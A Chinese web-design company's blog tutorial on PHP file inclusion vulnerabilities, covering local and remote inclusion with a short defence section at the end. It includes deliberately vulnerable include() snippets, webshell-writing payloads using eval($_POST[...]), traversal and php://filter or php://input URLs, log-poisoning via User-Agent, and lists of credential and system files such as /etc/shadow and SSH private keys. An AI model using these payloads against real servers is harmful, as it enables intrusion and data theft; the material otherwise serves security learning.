互联网知识

精准传达 • 价值共享

洞悉互联网前沿资讯,探寻网站营销规律

网站建设 > 互联网知识 >

查看其它板块

文件包含漏洞

作者:狐灵科技 | 2021-12-06 22:31 |点击:

文件包含

 


	

		

			 程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件, 而无需再次编写,这中文件调用的过程一般被称为文件包含。 程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用, 但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。 几乎所有脚本语言都会提供文件包含的功能,但文件包含漏洞在PHP Web Application中居多, 而在JSPASPASP.NET程序中却非常少,甚至没有,这是有些语言设计的弊端。 在PHP中经常出现包含漏洞,但这并不意味这其他语言不存在。

	

	

		

			

				

					 

			

			

				 

		

	

	



	1|0常见文件包含函数



	 



	
	

	

		

			include():执行到include时才包含文件,找不到被包含文件时只会产生警告,脚本将继续执行 require():只要程序一运行就包含文件,找不到被包含的文件时会产生致命错误,并停止脚本 include_once()和require_once():若文件中代码已被包含则不会再次包含

	

	

		

			

				

					 

			

			

				 

		

	

	



	 



	2|0利用条件



	
	

	

		

			* 程序用include()等文件包含函数通过动态变量的范式引入需要包含的文件 * 用户能够控制该动态变量 注:PHP中只要文件内容符合PHP语法规范,包含时不管扩展名是什么都会被PHP解析, 若文件内容不符合PHP语法规范则会暴漏其源码。

	

	



	3|0漏洞危害



	
	

	

		

			执行任意代码 包含恶意文件控制网站 甚至控制服务器

	

	



	4|0漏洞分类



	
	

	

		

			本地文件包含: 可以包含本地文件,在条件允许时甚至能执行代码 上传图片马,然后包含 读敏感文件,读PHP文件 包含日志文件GetShell 包含/proc/self/envion文件GetShell 包含data:或php://input等伪协议 若有phpinfo则可以包含临时文件 远程文件包含: 可以直接执行任意代码 要保证php.ini中allow_url_fopen和allow_url_include要为On * 白盒就代码审计 * 至于黑盒的话找cms或者上AWVS吧,骚年...

	

	

		

			

				

					 

			

			

				 

		

	

	



	5|0本地包含


    
	
  • 
		示例一
    • 




	
	

	

		

			<?php if(@$_GET['page']) { include($_GET['page']); } else { include "show.php"; } ?>

	

	



	

		
		

			 

	

	

		 

	

		 

	

		 

	

		 

	

		 

	

		 

	

		 

	

		 

	

		 

	

		 

	

		 

	

		 





	 



	 



	 



	




    
	
  • 
		示例二
    • 




	
	

	

		

			<?php if (@$_GET['page']) { include("./action/".$_GET['page']); } else { include "./action/show.php"; } ?>

	

	




	 



	

		 

	





	
    
		
  • 
			%00截断包含(PHP<5.3.4)
    • 
	





	

		
		

		

			

				<?php if (@$_GET['page']) { include "./action/".$_GET['page'].".php"; echo "./action/".$_GET['page'].".php"; } else { include "./action/show.php"; } ?>

		

		






	 




	 



	还有一个路径长度截断,



	Linux可以用./或/截断,需要文件名长度大于4096,



	Windows可以用\.或./或\或/截断,需要大于256,



	是否能成功截断有多方面原因,可以说是靠运气的



	





	
    
		
  • 
			示例四
    • 
	





	上传图片马,马包含的代码为



	

		
		

		

			

				<?php fputs(fopen("shell.php","w"),"<?php eval($_POST[xxser]);?>")?>

		

		

			

				

					

						 

				

				

					 

			

		

		





	上传后图片路径为 /uploadfile/201643.jpg



	这时候需要利用文件解析漏洞,当访问



	

		
		

		

			

				http://localhost/dvwa/vulnerabilities/fi/?page=../../uploadfile/201643.jpg/.php

		

		

			

				

					

						 

				

				

					 

			

		

		





	将会在fi这个文件夹下生成shell.php,内容为<?php eval($_POST[xxser]);?>



	
    
		
  • 
			读敏感文件
    • 
	

	

		

	

		

			
			

			

				

					可读如下敏感文件: WindowsC:\boot.ini //查看系统版本 C:\Windows\System32\inetsrv\MetaBase.xml //IIS配置文件 C:\Windows\repair\sam //存储系统初次安装的密码 C:\Program Files\mysql\my.ini //Mysql配置 C:\Program Files\mysql\data\mysql\user.MYD //Mysql root C:\Windows\php.ini //php配置信息 C:\Windows\my.ini //Mysql配置信息 ... Linux: /root/.ssh/authorized_keys /root/.ssh/id_rsa /root/.ssh/id_ras.keystore /root/.ssh/known_hosts /etc/passwd /etc/shadow /etc/my.cnf /etc/httpd/conf/httpd.conf /root/.bash_history /root/.mysql_history /proc/self/fd/fd[0-9]*(文件标识符) /proc/mounts /porc/config.gz

			

			

				

					

						

							 

					

					

						 

				

			

			

	





	
    
		
  • 
			读PHP文件
    • 
	

	

		
		

		

			

				直接包含php文件时会被解析,不能看到源码,可以用封装协议读取: ?page=php://filter/read=convert.base64-encode/resource=config.php 访问上述URL后会返回config.php中经过Base64加密后的字符串,解密即可得到源码

		

		





	
    
		
  • 
			包含日志(主要是得到日志的路径)
    • 
	

	

		
		

		

			

				读日志路径: 文件包含漏洞读取apache配置文件 index.php?page=/etc/init.d/httpd index.php?page=/etc/httpd/conf/httpd.conf 默认位置/var/log/httpd/access_log 日志会记录客户端请求及服务器响应的信息,访问 http://www.xx.com/<?php phpinfo(); ?> 时,<?php phpinfo(); ?>也会被记录在日志里,也可以插入到User-Agent

		

		

			

				

					

						 

				

				

					 

			

		

		





	

		
		

			 

		

			 

	





	 



	可以通过Burp Suite来绕过编码



	

		
		

			 

	





	 



	 



	日志内容如下:



	 




	 


    
	
  • 
		包含环境变量文件GetShell
    • 




	
	

	

		

			需要PHP运行在CGI模式 然后和包含日志一样,在User-Agent修改为payload

	

	

		

			

				

					 

			

			

				 

		

	

	



	
    
		
  • 
			使用PHP封装协议
    • 
	





	
	

	

		

			allow_url_include=On时, 若执行http://www.xxx.com/index.php?page=php://input, 并且提交数据 <?php fputs(fopen("shell.php","w"),"<?php eval($_POST['xxxser']);?>") ?> 结果将在index.php所在文件下生成一句话文件shell.php

	

	



	 
	

		 





	 



	
    
		
  • 
			phpinfo包含临时文件
    • 
	





	

		
		

		

			

				向phpinfo上传文件则可以返回文件路径,但是文件存在时间很短, 可以用程序持续上传,然后就可以包含你上传的文件了

		

		





	6|0远程包含



	注:远程的文件名不能为php可解析的扩展名,allow_url_fopen和allow_url_include为On是必须的



	

		





	若在a.txt写入 <?php fputs(fopen("shell.php","w"),"<?php @eval($_POST[xxx]); ?>") ?>,可直接写shell



	7|0漏洞防御



	 



	
	

	

		

			PHP中使用open_basedir配置,将访问限制在指定区域 过滤./\ 禁止服务器远程文件包含

	

	



	 


	  
	  

  
 
如没特殊注明,文章均为狐灵科技原创,转载请注明  https://www.hulingweb.cn/hulianwang/8910.html
     


	相关推荐
	



      
      

        返回首页
		
        	了解更多建站资讯
		
      

    


    

      

        
        
—— 微信公众号 ——

        

          
        

      

      

        
热门标签

        
      

      

        

          
上一篇———————

         判断来访是搜索引擎蜘蛛还是普通用户,蜘蛛正常抓取,用户跳转指定页面 
        

        

          
下一篇———————

        什么是低代码平台?有哪些比较好用的低代码开发平台? 
        

      

    

  









    

    

      
多一份免费策划方案,总有益处。

      

        
        
请直接添加技术总监微信联系咨询

      

      

        立即询问
        技术总监在线
        15523356218
      

    

  

	
      




        

            

                

                    网站设计
                    品牌营销
                

                

                    
多一份参考,总有益处

                    
联系狐灵科技,免费获得专属《策划方案》及报价

                    

                        
咨询相关问题或预约面谈,可以通过以下方式与我们联系

                        
业务热线:023-68168040 / 大客户专线:15523356218
                        

                    

                

            

            

                在线咨询
                在线咨询
                提交需求
            

        

    

	
		

        

            

                

                    

                        
关于狐灵科技
                        
                        +
                    
  
                    

                    
狐灵致力于互联网品牌建设与网络营销,专业领域包括  网站建设 SEO优化、移动互联网营销、高端网站建设、高端网站设计、品牌网站定制开发、营销策划推广电子商务、移动互联网营销、 为不同类型的客户提供良好的互联网应用定制解决方案,我们将策略和执行紧密结合,且不断评估并优化我们的方案,为客户提供一体化全方位的互联网品牌整合方案!								
                    
 
                

                

                    

                        
我们的优势

                    

                    

                        

                       
量身打造个性化网站制作


代码深度符合SEO优化


一站式企业网站建设服务


前沿视觉设计、研发能力


重庆网站建设公司

                       

                        

                       
多项网站设计传播大奖


营销型网站建设专家


自主研发网站管理系统


B2C电商网站建设供应商


完善的售后服务体系
         
                       
     
                    

                

                

                    

                        
我们的不同

                      +
                    

                    

                 在我们的对手消耗大量的时间停留在碎片化的互联网设计或者程序实现的时候,我们已经开始把数字化品牌建设和网络传播进行了整合。我们提供从前期的网站品牌分析策划、网站设计、创意表现、系统开发以及后续网站运营反馈建议等一系列服务,帮助企业打造创新的互联网品牌经营模式与有效的网络营销方法,为所有谋求长远发展的企业品牌贡献全力!
				   

                

            

            

                

                    友情链接
                    交换友情链接
                    交换友情链接
                    展开
                

                

                    

					

                    

                

            

        

        

            

                

                    公司地址:重庆市九龙坡杨家坪重百大楼21-8 | 业务热线:023-68168040 
                

                

                     Copyright © 2017-2020 Fox spirit Network. 狐灵科技 版权所有
 | 渝ICP备19005721号-1
                

                

                    专业团队为您提供
                    
                    重庆网页设计,
                    品牌网站设计,营销型网站制作,SEO优化关键词排名推广等服务,建网站就找狐灵科技!
                     | TAG标签					
                    | 网站建设地图
                    | 网站地图
					

			   

            

        

        

            
                业务咨询
            
            
                业务咨询
            
            
                业务热线
                023-68168040
            
            
                提交需求
                
            
            
                官方微信
                
                    狐灵网络科技官方微信